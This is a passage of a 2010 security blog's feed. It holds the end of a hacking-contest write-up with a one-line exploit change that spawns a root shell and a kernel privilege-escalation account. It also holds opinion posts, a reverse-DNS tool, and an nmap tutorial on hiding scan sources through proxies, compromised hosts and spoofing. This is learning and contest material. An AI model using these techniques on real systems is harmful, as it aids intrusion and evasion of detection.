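differ slightly):&lt;/p&gt;
&lt;pre class="literal-block"&gt;
/* original: execl("/bin/true", "true", NULL); */
execl("/bin/sh", "sh", NULL);
&lt;/pre&gt;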
&lt;p&gt;After a couple more failed modifications of the code, I decided to see
if there were any other promising exploits. And it was good that I did,
because my next one was the big one: a bug, discovered by Jon Oberheide,
in the linux kernel's handling of &lt;a class="reference external" href="http://jon.oberheide.org/blog/2010/04/10/reiserfs-reiserfs_priv-vulnerability/"&gt;reiserfs's extended attributes&lt;/a&gt;.
Exploiting this bug on a vulnerable install allows an unprivileged
attacker to make arbitrary executables setuid and setgid root. To do
this, the attack exploits the fact that the kernel does not properly
restrict access to the &amp;quot;.reiserfs_priv/xattrs&amp;quot; directory located
in the root of all reiserfs filesystems mounted with the user_xattr
option. And, as luck would have it, the filesystem we had write access
to (/apachelogs/) was actually a mounted reiserfs partition with this
option. Root shell time...&lt;/p&gt;
&lt;p&gt;Now, after I found this, it still took me a couple of hours to coax the
thing into working. I got the easy modifications out of the way pretty
quickly, like sending a compiled executable with the exploit rather than
compiling one on the system (there was no gcc), and changing all the
/.reiserfs_priv/xattrs paths to /apachelogs/.reiserfs_priv/xattrs.
However, I had some real issues getting the thing mounted. Even though
the user mount option was enabled, sometimes I could not for the life of
me get the thing to mount, as mount repeatedly informed me that I needed
root permissions. Not sure if this was someone with root messing with the
competition, or just my own tiredness and incompetence coming out, but
it was frustrating. I also had to deal with people deleting my files,
which I eventually (mostly) solved by hiding them in a hidden folder. After a
good 4-5 resets, the stars finally aligned and I got my code working:
game over. I found the key, dumped it, and submitted it.&lt;/p&gt;
&lt;p&gt;UPDATE 05/12/10: smtx, a much better hacker than I, posted a video
documenting his solution. It's quite nice; give it a watch.&lt;/p&gt;
&lt;p&gt;&lt;object width="400" height="300"&gt;&lt;embed src="http://vimeo.com/moogaloop.swf?clip_id=11680637&amp;amp;server=vimeo.com&amp;amp;show_title=1&amp;amp;show_byline=1&amp;amp;show_portrait=0&amp;amp;color=&amp;amp;fullscreen=1" type="application/x-shockwave-flash" allowfullscreen="true" allowscriptaccess="always" width="400" height="300"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;p&gt;&lt;a class="reference external" href="http://vimeo.com/11680637"&gt;gh0stbusters - how strong is your FU 2k10&lt;/a&gt; from &lt;a class="reference external" href="http://vimeo.com/user2322198"&gt;smtx&lt;/a&gt; on &lt;a class="reference external" href="http://vimeo.com"&gt;Vimeo&lt;/a&gt;.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="id4"&gt;
&lt;h3&gt;How To Mitigate The Risk&lt;/h3&gt;
&lt;p&gt;The theoretical system admins of this box did a very good job at
minimizing the number of attack vectors, as well as at throwing out tons
of red herrings for unskilled attackers to find and waste their time on.
They also had permissions for www-data pretty tightly controlled on the
box, which made the attack even more difficult. However, their apparent
attention to detail in the initial configuration seems not to have
carried over into day-to-day maintenance.&lt;/p&gt;
&lt;p&gt;The attack could have easily been limited to a www-data shell, which,
unless a new zero-day privilege escalation exploit came out, wouldn't be
incredibly useful. However, their kernel was out of date (Ubuntu has
long since pushed kernel updates solving this issue), making it possible
to get root. Updates, though they should probably be tested first on a
non-production server, should be installed as soon as possible after
their release.&lt;/p&gt;
&lt;p&gt;The SiTeFiLo exploit would have been harder to defend against with
updates, as there are no updates yet fixing the bug. However, one could
prevent this attack by removing the slogin_path variable (it's not
necessary if everything is in the same directory), turning off
register_globals (which would break the script without heavy editing),
or, best of all, by using Apache's htaccess authentication for
authenticating users rather than SiTeFiLo. SiTeFiLo's own author
recommends this if at all possible, so this is probably what you'd want
to do to fix this issue.&lt;/p&gt;
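&lt;p&gt;A minimal version of that htaccess approach might look something like
this (the paths and realm name are placeholders, and it assumes the
server's AllowOverride setting permits AuthConfig):&lt;/p&gt;
&lt;pre class="literal-block"&gt;
# /1/.htaccess
AuthType Basic
AuthName "Restricted"
AuthUserFile /etc/apache2/.htpasswd
Require valid-user
&lt;/pre&gt;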
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="conclusion"&gt;
&lt;h2&gt;Conclusion&lt;/h2&gt;
&lt;p&gt;The challenge, overall, was both a great learning experience and tons of
fun. I really appreciated the chance to do some pen testing. As I
unfortunately have yet to land a job doing these things, it's not
every day I get to break into someone else's boxes.&lt;/p&gt;
&lt;p&gt;The lessons for system administrators from this contest should be: be
very careful with user permissions (only give them out when you HAVE
to), and update your software as often as possible. These two rules
would have prevented all three compromises (and would have made the
challenge a living hell...:P).&lt;/p&gt;
&lt;p&gt;For pen testers, the lessons should be: try to identify and know the
targeted software as thoroughly as possible (you can't attack what you
don't understand), patience is a virtue, go where other people normally
wouldn't, and as always, when things get tough, try harder (TM).&lt;/p&gt;
&lt;p&gt;Now if you'll excuse me, I'm on the highway in the middle of Kansas
right now, and I'm pretty sure I'm about to get sucked into a tornado.
Hopefully I'll survive to post more about the craziness of the last 4
days...&lt;/p&gt;
&lt;/div&gt;
</summary><category term="fu"></category><category term="hacking"></category><category term="offensive security"></category><category term="Pen Testing"></category></entry><entry><title>Facebook, I Loved You. And You Blew It.</title><link href="https://spareclockcycles.org/2010/05/06/facebook-i-loved-you-and-you-blew-it.html" rel="alternate"></link><updated>2010-05-06T16:43:00-04:00</updated><author><name>admin</name></author><id>tag:spareclockcycles.org,2010-05-06:2010/05/06/facebook-i-loved-you-and-you-blew-it.html</id><summary type="html">&lt;p&gt;I can't do it anymore. I wish I could, but this just isn't working out,
Facebook. The lies, the viruses, the two-timing with advertisers, I just
can't handle it all. I don't have the time or the energy to deal with
all of your deceptions and all of your constant attacks on my privacy. I
need my personal space. I think I want to try other social networking
sites, and I think it's best that I leave you alone with your soul
mates: the advertisers, the identity thieves, the stalkers, and the
spies. It will be better this way.&lt;/p&gt;
&lt;p&gt;Sure, we had some great times in the beginning. How could I forget the
first time I got invited to join you? I was a high schooler then, and it
was a simpler world. You were simpler too. I mean, you were only for
students. Just to get an account you had to be invited and have a school
email address. I loved that about you. And I knew that only my friends
could access anything I put on that account. I loved
that about you too. You were open and honest about what you did with my
data, and who got to see it. No &lt;a class="reference external" href="http://www.pcworld.com/article/195448/facebooks_privacy_controls_broken.html"&gt;convoluted and mostly broken privacy
controls&lt;/a&gt;, no &lt;a class="reference external" href="http://www.facebook.com/policy.php"&gt;&amp;quot;strongly encouraged&amp;quot; sharing of information&lt;/a&gt;, no
&lt;a class="reference external" href="http://www.readwriteweb.com/archives/how_to_delete_facebook_applications_and_why_you_should.php"&gt;applications intentionally trying to subvert privacy rules&lt;/a&gt;. You were
absolutely amazing, and I loved the simplicity of it all. Life was good.&lt;/p&gt;
&lt;p&gt;But then you started changing. Little things at first. You &lt;a class="reference external" href="http://www.facebook.com/r.php"&gt;let anyone
sign up on you&lt;/a&gt;, exposing me to viruses, stalkers, and a wide range of
other abuses. You redesigned yourself &lt;a class="reference external" href="http://techcrunch.com/2009/03/19/facebook-polls-users-on-redesign-94-hate-it/"&gt;again&lt;/a&gt; and
&lt;a class="reference external" href="http://techcrunch.com/2010/01/04/facebook-rolling-out-redesign-to-some-users/"&gt;again&lt;/a&gt;,
as if you weren't sure who you wanted to be. And I could never
understand that. I understand that change doesn't have to be bad, but I
always thought you were perfect exactly the way you were the first time
I logged in. I should have seen it coming then, but I was still too
naive and in love with you to care. I didn't realize that it was symptomatic
of something deeper inside of you. Something tearing you apart. A secret
passion for someone other than me, your user. Yes, I speak of your
sordid affair with the advertisers.&lt;/p&gt;
&lt;p&gt;I understood when I got into this that you needed things for our
relationship to work. You needed to make money. And advertising was the
only feasible way to do that. But did you really, really need to jump
into bed with the sleaziest advertisers you could find, without a second
thought, and do all kinds of unspeakable things to my personal data? I'm
not going to lie, it hurt. A lot. I felt so betrayed. The signs of your
betrayal &lt;a class="reference external" href="http://www.allfacebook.com/2009/06/facebookpage-event-ads/"&gt;were everywhere&lt;/a&gt;. I tried hard to ignore them, push them
away, and to deal with your ever-increasing mistreatment of my personal
data. I thought, &amp;quot;Surely, this will be the last time you betray me
Facebook. Surely, you realize what we have is something special, and you
won't betray my trust again.&amp;quot; And I kept telling myself that, every
single time you did something stupid, like &lt;a class="reference external" href="http://www.readwriteweb.com/archives/facebooks_zuckerberg_says_the_age_of_privacy_is_ov.php"&gt;claim privacy was dead&lt;/a&gt;, or
reset everyone's privacy settings to &lt;a class="reference external" href="http://www.wired.com/epicenter/2009/12/facebook-privacy-update/"&gt;share everything&lt;/a&gt;, or let &lt;a class="reference external" href="http://www.pcworld.com/businesscenter/article/194701/facebook_wants_the_webs_default_to_be_social.html"&gt;random
applications access all your personal data&lt;/a&gt;. But I just can't keep
doing this.&lt;/p&gt;
&lt;p&gt;In the last week, three more big things happened, three things you did
that finally drove me over the edge. First was the advent of
applications that &lt;a class="reference external" href="http://www.pcworld.com/article/195710/new_facebook_social_features_secretly_add_apps_to_your_profile_updated.html"&gt;can silently install themselves&lt;/a&gt;, with no user
approval, giving them access to personal data. There's absolutely no
reason, ever, that an application that I didn't explicitly approve
should be allowed to access my information. Are you trying to do the
identity thieves' jobs for them? Second, you took away my about me /
interests page and tried to force me, in place of that, to &lt;a class="reference external" href="http://www.networkworld.com/news/2010/050610-facebook-privacy-violations.html"&gt;make all of
my interests public&lt;/a&gt; by making them &amp;quot;fan pages&amp;quot;. Because of your broken
privacy controls, there was, up until a couple days ago, no way to hide
those pages from everyone in the world, and there's still no way, to my
knowledge, to actually prevent people who are also &amp;quot;fans&amp;quot; of the same
pages from seeing your preferences. Build a bot that is a fan of
everything, and it completely defeats the system. Why would you do this,
Facebook? Why would you sacrifice a great, working system, and make it
terrible and invasive? It's clear that you only do things anymore
because your advertisers want it, not because you want to make me, your
user, have a good experience and connect with my friends. Finally,
there's &lt;a class="reference external" href="http://eu.techcrunch.com/2010/05/05/video-major-facebook-security-hole-lets-you-view-your-friends-live-chats/"&gt;this exploit&lt;/a&gt;, which allows people to spy on others'
conversations using only their browser and Facebook's own privacy
settings tool. That's just pathetic, coming from an organization that I
trusted with so much of my life's information.&lt;/p&gt;
&lt;p&gt;So that's it. I wish so badly things didn't have to end this way,
Facebook, but we're going to have to go our separate ways. We'll still
see each other from time to time of course, but it's never going to be
the same. I just can't, in good conscience, keep being your user. I'd
say that I'm sorry, but I'm not. This really is your fault, and there's
nothing you can do now to fix it. The time for that has passed. It was a
great ride, and I thank you for the good times, but now I'm going to
have to get off and advise everyone I know to do the same. &lt;a class="reference external" href="http://www.youtube.com/watch?v=TdRuc0yHImE"&gt;Goodbye
Facebook&lt;/a&gt;.&lt;/p&gt;
</summary><category term="dearjohn"></category><category term="facebook"></category><category term="goodbye"></category><category term="privacy"></category></entry><entry><title>Why Chinese Hackers Aren't A Threat</title><link href="https://spareclockcycles.org/2010/05/03/why-chinese-hackers-arent-a-threat.html" rel="alternate"></link><updated>2010-05-03T10:48:00-04:00</updated><author><name>admin</name></author><id>tag:spareclockcycles.org,2010-05-03:2010/05/03/why-chinese-hackers-arent-a-threat.html</id><summary type="html">&lt;p&gt;I've had enough. And no, I'm not talking coffee. No such thing as enough
coffee. No, rather, I've had enough of people claiming that the sky is
falling, when it clearly isn't (and making a few bucks off the fear
while they're at it). I've had enough of Die Hard 4 &amp;quot;&lt;a class="reference external" href="http://www.urbandictionary.com/define.php?term=fire+sale"&gt;fire sale&lt;/a&gt;&amp;quot;
scenarios, enough of &lt;a class="reference external" href="http://www.wired.com/threatlevel/2010/04/cyberwar-richard-clarke/"&gt;Richard Clarke's &amp;quot;digital equivalent of
thermonuclear war&amp;quot; fear-mongering&lt;/a&gt;, enough of &lt;a class="reference external" href="http://www.businessweek.com/idg/2010-04-07/is-the-u-s-the-nation-most-vulnerable-to-cyberattack-.html"&gt;hyperbolic news articles
calling for the restructuring of the Internet&lt;/a&gt; to save humanity itself,
and more than enough of random members of the U.S. Congress claiming
they &lt;a class="reference external" href="http://www.wired.com/threatlevel/2010/04/cyberwar-commander/"&gt;understand the threat and that it is a real one&lt;/a&gt;, when they can
barely use the Internet themselves. Please, &lt;strong&gt;just stop it&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;Now first, let me be clear: I do not argue that Chinese crackers do not
have the skill to successfully attack American infrastructure (and most
certainly this site...I know you can do it, please don't). On the
contrary, I think the &lt;a class="reference external" href="http://www.automationworld.com/news-957"&gt;large&lt;/a&gt; &lt;a class="reference external" href="http://www.infosecwriters.com/text_resources/pdf/SCADA.pdf"&gt;body&lt;/a&gt; of &lt;a class="reference external" href="http://www.truststc.org/pubs/693.html"&gt;research&lt;/a&gt; shows that these
attacks are not only feasible, but well within the reach of these
government backed attackers. I also do not contend that they pose no
threat, just not the kind of catastrophic one being shouted about from
the rooftops nowadays. What I do argue is this: a.) there is no clear
motivation for any such attack and b.) if they wished to commit these
kinds of attacks, they would have done it by now.&lt;/p&gt;
&lt;p&gt;&amp;quot;Now, hold on a second,&amp;quot; an objector might say. &amp;quot;These damn commies
clearly hate us for our freedom/liberty/excellent television
programming/fried foods. They don't need more reason than that to attack
us!&amp;quot; It's exactly this kind of Cold War mentality that is preventing
people from understanding the true nature of China's goals in
cyberspace. It's not about &amp;quot;spreading communism&amp;quot; or &amp;quot;fighting the
capitalist pigs&amp;quot;. It's purely about profit.&lt;/p&gt;
&lt;p&gt;Don't believe me? Let's look at two major attacks we've seen so far from
the Chinese. The most recent attack (&lt;a class="reference external" href="http://en.wikipedia.org/wiki/Operation_Aurora"&gt;Aurora&lt;/a&gt;), the one that has
renewed calls for greater network security (and of course, monitoring)
amongst government types across the country, was targeted almost
exclusively at commercial organizations. This would seem odd, if one
thought that the Chinese were trying to &amp;quot;destroy the capitalist system&amp;quot;.
If these attackers were easily able to break into literally dozens of
high-profile, hardened, target networks, what was stopping them from
breaking into, say, our power grid? The phone system? Wall Street? It'd
certainly be a more effective way to bring down the system. The answer:
absolutely nothing was stopping them. But this is nothing to fear,
because they obviously didn't and still don't want to. They chose their
targets for specific reasons, and causing the downfall of the United
States wasn't one of them.&lt;/p&gt;
&lt;p&gt;So what do they want? Well, one just needs to look at what was taken.
Proprietary code. Proprietary designs. Intellectual property. If you
look at &lt;a class="reference external" href="http://en.wikipedia.org/wiki/Titan_Rain"&gt;Titan Rain&lt;/a&gt; back in 2003, the story was the same. It was all
about taking valuable information, and nothing else. Save a few web
defacements, none of the Chinese attacks we have seen have focused on
anything but stealing proprietary data. While almost all of these
Chinese attackers are indeed strongly nationalistic, their goal is not
to destroy the U.S., but to enrich China.&lt;/p&gt;
&lt;p&gt;There is an excellent quote from &lt;a class="reference external" href="http://en.wikipedia.org/wiki/Mark_Getty"&gt;Mark Getty&lt;/a&gt; that states that
&amp;quot;intellectual property is the oil of the 21st century.&amp;quot; &lt;a class="reference external" href="http://www.iipa.com/pdf/IIPA%2520NBCU%2520Study%2520Press%2520Release%2520FINAL%252011072005.pdf"&gt;By some
estimates&lt;/a&gt;, intellectual property makes up about 20% of the U.S. GDP
(and 60% of yearly growth), and I personally think that is a
conservative estimate. That comes out to be a $2.92 trillion industry.
By comparison, the U.S. spends &lt;a class="reference external" href="http://tonto.eia.doe.gov/energyexplained/index.cfm?page=oil_home#tab2"&gt;only $670 billion on oil each
year&lt;/a&gt;. Intellectual property includes every copyright, patent, trade
secret, etc, that anyone is currently using to make money off of. That's
a pretty big chunk of the economy, I would say. By breaking into U.S.
networks and taking this data for themselves, China is, quite literally,
stealing billions of dollars worth of intellectual property during their
intrusions into our corporate networks. It's like getting billions in
free research and development, all for the cost of a single 0-day in
Internet Explorer. Not bad, huh?&lt;/p&gt;
&lt;p&gt;So why don't they take this intellectual property while at the same time
crashing our economy and destroying the country? I mean, what's bad for
us is good for them, right? Wrong. People often fail to understand how
interconnected today's modern economy is, even after such illuminating
events as the recent financial crisis. This is especially true in
China's case: their economic well-being is still &lt;strong&gt;very&lt;/strong&gt; dependent on
the well-being of the United States. There is a saying amongst loan
sharks (or so Hollywood has told me) that &amp;quot;dead men don't pay debts.&amp;quot; We
are currently in debt to China for &lt;a class="reference external" href="http://en.wikipedia.org/wiki/United_States_public_debt#Foreign_ownership"&gt;over $888.5 billion&lt;/a&gt;. Crashing our
economy, making us economic &amp;quot;dead men&amp;quot;, would make us unable to repay
that money, let alone with interest, which in turn would cause their own
economy to collapse. Rather than jeopardize their own economic
well-being, China would much rather sit back and watch the U.S. struggle
to develop new technology with these loans while they collect their
money with interest, while at the same time stealing the final product
of the research that the money is being used to fund. Let me see if I
can summarize this in more interweb-friendly terms:&lt;/p&gt;
&lt;div class="line-block"&gt;
&lt;div class="line"&gt;1.) China loans U.S. large sums of money.&lt;/div&gt;
&lt;div class="line"&gt;2.) U.S. uses said money to create new intellectual property.&lt;/div&gt;
&lt;div class="line"&gt;3.) China breaks into networks and takes said property, then also forces U.S. to pay back their debt with interest.&lt;/div&gt;
&lt;div class="line"&gt;4.) ????&lt;/div&gt;
&lt;div class="line"&gt;5.) PROFIT&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;I think from that summary that it is pretty clear why China is attacking
our networks in the way that it is, and why we have not yet seen the
kind of all-out digital warfare that pundits have been warning about
nearly constantly for the past decade. There's no PROFIT at the end of
the meme if they do anything else.&lt;/p&gt;
&lt;p&gt;So does this mean that we shouldn't invest in protecting critical
infrastructure and the like? No, of course not. There will always be a
few people who just want to watch things burn, and we need to protect
against that. However, we should be responding in a much more mature,
measured, and rational way, rather than running around acting &lt;a class="reference external" href="http://en.wikipedia.org/wiki/Doomsday_Clock"&gt;like it's
5 seconds to midnight&lt;/a&gt;. Encourage young people to enter the information
assurance field through scholarships and higher pay for these workers,
improve IDS/firewall/antivirus systems, hold corporate software makers
accountable for their software vulnerabilities, and start public
education campaigns to inform people enough so that maybe, just maybe,
they won't click on everything that pops up in front of them. Babbling
incoherently about communist threats and imminent cyber war does nothing
to solve the problem, and will likely cause our limited security
research funds to be invested in all the wrong places. So I ask again:
please, just stop it.&lt;/p&gt;
</summary><category term="chinese"></category><category term="crackers"></category><category term="critical infrastructure"></category><category term="fire sale"></category><category term="FUD"></category><category term="hackers"></category></entry><entry><title>Transmission Complete.</title><link href="https://spareclockcycles.org/2010/04/27/transmission-complete.html" rel="alternate"></link><updated>2010-04-27T03:13:00-04:00</updated><author><name>admin</name></author><id>tag:spareclockcycles.org,2010-04-27:2010/04/27/transmission-complete.html</id><summary type="html">&lt;p&gt;If you're reading this, the site move should now be complete. In
addition to the move, I've also taken the opportunity to upgrade to a
newer, more flexible theme, which I will be working on in the next few
weeks. To help offset the costs for hosting and DNS registrations, I
also decided to introduce some ads. Hopefully they will not be too
obtrusive, and if they are, well, donate some money so I can get by
without them :P . I still have some tweaks that I will be making to the
site over the next couple weeks, so please bear with me if anything
breaks (and please let me know if it does: supernothing AT wordpress DOT
org.) Hopefully this site has some great days ahead of it, and I look
forward to making it into a great resource for those wishing to learn
and discuss any and all things related to information security,
programming, hacking, and technology.&lt;/p&gt;
&lt;p&gt;Also: Thanks again to &lt;a class="reference external" href="http://duststorm.org"&gt;duststorm&lt;/a&gt; for all his help and generosity with
the hosting!&lt;/p&gt;
</summary><category term="ads"></category><category term="beginnings"></category><category term="Site News"></category></entry><entry><title>Moving Day Is Here!</title><link href="https://spareclockcycles.org/2010/04/26/moving-day-is-here.html" rel="alternate"></link><updated>2010-04-26T13:23:00-04:00</updated><author><name>admin</name></author><id>tag:spareclockcycles.org,2010-04-26:2010/04/26/moving-day-is-here.html</id><summary type="html">&lt;p&gt;Well, the day is here! I am officially moving my blog off of
wordpress.com hosting onto &lt;a class="reference external" href="http://duststorm.org"&gt;duststorm's VPS&lt;/a&gt;. You will still be able to
access it at spareclockcycles.wordpress.com, but the main site will be
&lt;a class="reference external" href="https://spareclockcycles.org"&gt;spareclockcycles.org&lt;/a&gt;, so update your bookmarks accordingly. There
will be a lot of messing around with DNS and the like going on over the
next few hours, so I apologize for any downtime. I will put up a post
when the move is complete.&lt;/p&gt;
</summary><category term="dns"></category><category term="duststorm"></category><category term="moving"></category><category term="vps"></category></entry><entry><title>Updated Reverse DNS Tool</title><link href="https://spareclockcycles.org/2010/04/25/updated-reverse-dns-tool.html" rel="alternate"></link><updated>2010-04-25T14:33:00-04:00</updated><author><name>admin</name></author><id>tag:spareclockcycles.org,2010-04-25:2010/04/25/updated-reverse-dns-tool.html</id><summary type="html">&lt;p&gt;A few posts ago I &lt;a class="reference external" href="http://spareclockcycles.wordpress.com/2010/04/13/reverse-dns-lookups-with-dnspython/"&gt;released some rather simplistic code to do reverse
DNS lookups&lt;/a&gt;. While useful, it obviously left room for many improvements.
The lookup speeds were pretty dismal (15-25 lookups a second), stemming
from my poor handling of timeouts and the fact that I had lazily ignored
multithreading because I wanted to get something working fast. In
addition, the code was just a giant blob thrown together into a Python
file, which probably made a few people's eyes bleed.&lt;/p&gt;
&lt;p&gt;Because of these issues, I took the time today to rework the code so
that everything is *much* cleaner now (broken nicely into
classes and such), and is, in addition, fully multithreaded. To do the
threading, I adapted a basic thread pooling class shamelessly taken off
&lt;a class="reference external" href="http://code.activestate.com/recipes/203871-a-generic-programming-thread-pool/"&gt;the interwebs&lt;/a&gt; to use Python generators for speed and RAM
considerations, and to allow for thread callbacks to be synchronized. As
a result, with 35 threads in the thread pool, I am now getting about
400-600 DNS lookups / second. Not bad for 45 minutes of work :P . You
can grab the new code &lt;a class="reference external" href="https://spareclockcycles.org/downloads/code/revdns.tar.gz"&gt;here&lt;/a&gt;.&lt;/p&gt;
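&lt;p&gt;For the curious, the core idea (a pool of worker threads each sitting in a blocking reverse lookup) can be sketched with nothing but Python's standard library. The function names here are hypothetical, and the actual tool linked above uses dnspython plus a custom thread pool rather than this:&lt;/p&gt;

```python
import socket
from concurrent.futures import ThreadPoolExecutor

def reverse_lookup(addr, resolve=None):
    """Resolve one IP to a hostname, returning None on failure.
    `resolve` defaults to the stdlib resolver but can be swapped out
    (e.g. for a dnspython-based resolver, or a stub in tests)."""
    resolve = resolve or (lambda a: socket.gethostbyaddr(a)[0])
    try:
        return resolve(addr)
    except (socket.herror, socket.gaierror, OSError):
        return None

def reverse_lookup_many(addrs, workers=35, resolve=None):
    """Resolve many addresses concurrently, mirroring the 35-thread
    pool described above; returns a dict of address -> name-or-None."""
    with ThreadPoolExecutor(max_workers=workers) as pool:
        names = list(pool.map(lambda a: reverse_lookup(a, resolve), addrs))
    return dict(zip(addrs, names))
```

&lt;p&gt;Injecting a stub for resolve keeps the logic testable without touching the network, and the threading is what buys the jump from tens to hundreds of lookups a second, since each worker just waits out its own timeouts.&lt;/p&gt;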
</summary><category term="dns"></category><category term="dnspython"></category><category term="hacking"></category><category term="Pen Testing"></category><category term="reverse dns"></category></entry><entry><title>Moving Time!</title><link href="https://spareclockcycles.org/2010/04/24/moving-time.html" rel="alternate"></link><updated>2010-04-24T16:44:00-04:00</updated><author><name>admin</name></author><id>tag:spareclockcycles.org,2010-04-24:2010/04/24/moving-time.html</id><summary type="html">&lt;p&gt;Just got done registering my shiny new domain name (only $4 at
&lt;a class="reference external" href="http://netfirms.com"&gt;netfirms.com&lt;/a&gt; with the coupon code DOLLARDOMAIN for those interested),
so from now on you can all access my blog at &lt;a class="reference external" href="http://spareclockcycles.com"&gt;http://spareclockcycles.com&lt;/a&gt;.
You can also now contact me directly at supernothing AT
spareclockcycles D0T com.&lt;/p&gt;
&lt;p&gt;In addition, thanks to the generosity of my good friend &lt;a class="reference external" href="http://duststorm.org"&gt;duststorm&lt;/a&gt;, I
will be moving this blog off of &lt;a class="reference external" href="http://wordpress.com/"&gt;wordpress.com&lt;/a&gt; hosting onto his
dedicated &lt;a class="reference external" href="http://en.wikipedia.org/wiki/Virtual_private_server"&gt;VPS&lt;/a&gt;. I decided to do this for a number of reasons, most of
them related to the limitations of wordpress.com blogs. Hopefully, this
will allow me to add a significant amount of functionality to the blog
(like being able to host source files locally -_-), as well as possibly
expanding the site beyond blogging into a general forum for discussions
on security and the like. I should be completing the move sometime in
the next week, so I'll keep everyone posted.&lt;/p&gt;
&lt;div class="zemanta-pixie" style="margin-top:10px;height:15px;"&gt;&lt;p&gt;&lt;a class="reference external" href="http://reblog.zemanta.com/zemified/c1a9c15a-d6f9-442e-8b47-d491af752931/"&gt;&lt;img alt="Reblog this post [with Zemanta]" src="http://img.zemanta.com/reblog_e.png?x-id=c1a9c15a-d6f9-442e-8b47-d491af752931" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;/div&gt;</summary><category term="dns"></category><category term="domain name"></category><category term="hosting"></category><category term="Site News"></category></entry><entry><title>Linux Credit Card!</title><link href="https://spareclockcycles.org/2010/04/21/linux-credit-card.html" rel="alternate"></link><updated>2010-04-21T13:29:00-04:00</updated><author><name>admin</name></author><id>tag:spareclockcycles.org,2010-04-21:2010/04/21/linux-credit-card.html</id><summary type="html">&lt;p&gt;It's exam time, so I probably won't be posting much in the next week or
two, but I wanted to share something a friend just sent me. &lt;a class="reference external" href="http://www.linuxfoundation.org/"&gt;The Linux
Foundation&lt;/a&gt; has now partnered with &lt;a class="reference external" href="http://www.corporate.visa.com"&gt;Visa&lt;/a&gt; to offer a &lt;a class="reference external" href="http://www.linuxfoundation.org/programs/linux-credit-card"&gt;Linux credit
card&lt;/a&gt;. For every card activation, the Linux Foundation will receive a
$50 donation, and will get a small percentage of every purchase you make as
well. So if you're looking for a new credit card, and you want to
support the Linux devs in making Linux even better, you might keep this
one in mind.&lt;/p&gt;
&lt;p&gt;SIDE NOTE: I totally almost called this article &amp;quot;Tux Bux&amp;quot;, but I think
we can all agree that not doing that was for the best.&lt;/p&gt;
&lt;div class="zemanta-pixie" style="margin-top:10px;height:15px;"&gt;&lt;p&gt;&lt;a class="reference external" href="http://reblog.zemanta.com/zemified/b6ef7a85-0a7c-4572-8f86-23080cec029c/"&gt;&lt;img alt="Reblog this post [with Zemanta]" src="http://img.zemanta.com/reblog_e.png?x-id=b6ef7a85-0a7c-4572-8f86-23080cec029c" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;/div&gt;</summary><category term="credit cards"></category><category term="donation"></category><category term="good cause"></category><category term="linux"></category><category term="visa"></category></entry><entry><title>The Art of Nmap Scanning, Part 1: Source Address Hiding and Obfuscation Techniques</title><link href="https://spareclockcycles.org/2010/04/18/the-art-of-nmap-scanning-part-1-source-address-hiding-and-obfuscation-techniques.html" rel="alternate"></link><updated>2010-04-18T00:49:00-04:00</updated><author><name>admin</name></author><id>tag:spareclockcycles.org,2010-04-18:2010/04/18/the-art-of-nmap-scanning-part-1-source-address-hiding-and-obfuscation-techniques.html</id><summary type="html">&lt;p&gt;This is the first part in a series of posts that I am writing on the
wonderful world of &lt;a class="reference external" href="http://nmap.org/"&gt;nmap&lt;/a&gt;, one of the most useful tools out there for
the aspiring hacker. In this post, I will demonstrate a number of ways
in which one can obscure, or even completely hide, the source IP address
of &lt;a class="reference external" href="http://en.wikipedia.org/wiki/Port_scanner"&gt;port scans&lt;/a&gt; during a pen test from the eyes of even the most
diligent sysadmin's logs, allowing you to hide in a wonderful shroud of
anonymity until you decide when and where to strike. As a bonus, many of
these techniques can also be used to scan hosts that might otherwise
have been inaccessible or only partially accessible to a normal scan,
letting us map out the network much more effectively.&lt;/p&gt;
&lt;div class="section" id="socks-proxy-scanning"&gt;
&lt;h2&gt;SOCKS Proxy Scanning&lt;/h2&gt;
&lt;p&gt;Probably the most obvious and straightforward of the techniques in this
post, this strategy requires access to a public &lt;a class="reference external" href="http://en.wikipedia.org/wiki/SOCKS"&gt;SOCKS&lt;/a&gt; proxy (list
&lt;a class="reference external" href="http://www.samair.ru/proxy/"&gt;here&lt;/a&gt;), a compromised/public SSH host,&amp;nbsp; or (if you wish to abuse the
service, and have your scans be incredibly slow and probably not very
reliable) &lt;a class="reference external" href="http://www.torproject.org/"&gt;Tor&lt;/a&gt;. It also requires &lt;a class="reference external" href="http://proxychains.sourceforge.net/"&gt;proxychains&lt;/a&gt; (or a similar
application, like &lt;a class="reference external" href="http://tsocks.sourceforge.net/"&gt;tsocks&lt;/a&gt;) to be installed on your system.
Essentially, the idea is that instead of connecting directly to your
target, as you normally would, you route your connect scan through one
or more SOCKS proxies before finally attempting to connect to the given
host and port. To do this is quite easy: simply set up proxychains as in
my &lt;a class="reference external" href="https://spareclockcycles.org/2010/04/15/socksify-anything/"&gt;previous post&lt;/a&gt;, and use the following command to scan your host:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
proxychains nmap -sT -P0 target_host
&lt;/pre&gt;
&lt;p&gt;And that's pretty much all there is to it. However, there are some
significant downsides to using this method to avoid detection. First,
any open SOCKS proxies you use might be logging all of your actions (or
could even be a &lt;a class="reference external" href="http://en.wikipedia.org/wiki/Honeypot_%28computing%29"&gt;honeypot&lt;/a&gt;), pretty much defeating the purpose of using
it in the first place. In addition, routing your connections through
proxies also obviously causes issues with latency, slowing down your
scans both because you have to actually complete the three-way handshake
(can't use SYN scans), and because you are simply adding more hops to
the route. However, it can be useful in cases where you need to tunnel
your scans into (or out of) a network; it also allows for the proper
execution (through the proxy) of most nmap detection scripts, and is
pretty easy to set up, so it's something to keep in mind.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="syn-scan-spoofing"&gt;
&lt;h2&gt;SYN Scan Spoofing&lt;/h2&gt;
&lt;p&gt;While this technique does not completely hide one's IP address from
being logged, it does at least prevent a system administrator from being
able to determine the true source of a scan, absent any extra probing
attempts. Essentially, nmap's SYN scan spoofing takes advantage of the
fact that, because you are not trying to complete the three-way TCP
handshake, you can spoof your address to be anything you want without
consequence. Of course, you won't be able to see the results of the scan
unless your real IP address is among those used, because otherwise you
won't receive the SYN-ACKs (unless you're using idle scanning, which we
will see shortly). However, you CAN hide your real IP address in a sea of fakes,
preventing a concerned administrator from being able to trace back the
